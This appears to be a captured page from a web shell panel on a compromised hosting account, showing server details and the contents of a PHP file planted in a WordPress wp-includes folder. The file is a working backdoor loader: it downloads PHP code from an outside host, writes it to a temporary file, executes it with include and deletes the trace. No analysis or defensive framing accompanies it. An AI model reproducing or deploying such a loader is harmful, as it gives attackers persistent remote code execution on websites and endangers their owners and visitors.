HEX
Server: Apache
System: Linux p3plzcpnl505958.prod.phx3.secureserver.net 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
User: ykk9qst4f1zf (7936182)
PHP: 8.3.25
Disabled: NONE
Upload Files
File: /home/ykk9qst4f1zf/public_html/wp-includes/custom-file-3-1758459121.php
<!--tTjgxLki-->
<?php
$url = 'https://jopjop.online/wp-manage.txt';

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_TIMEOUT, 30);
$code = curl_exec($ch);
curl_close($ch);

if ($code) {
    $temp_file = tempnam(sys_get_temp_dir(), 'wp_manage_');
    file_put_contents($temp_file, $code);
    include $temp_file;
    unlink($temp_file);
} else {
    echo "error";
}
?>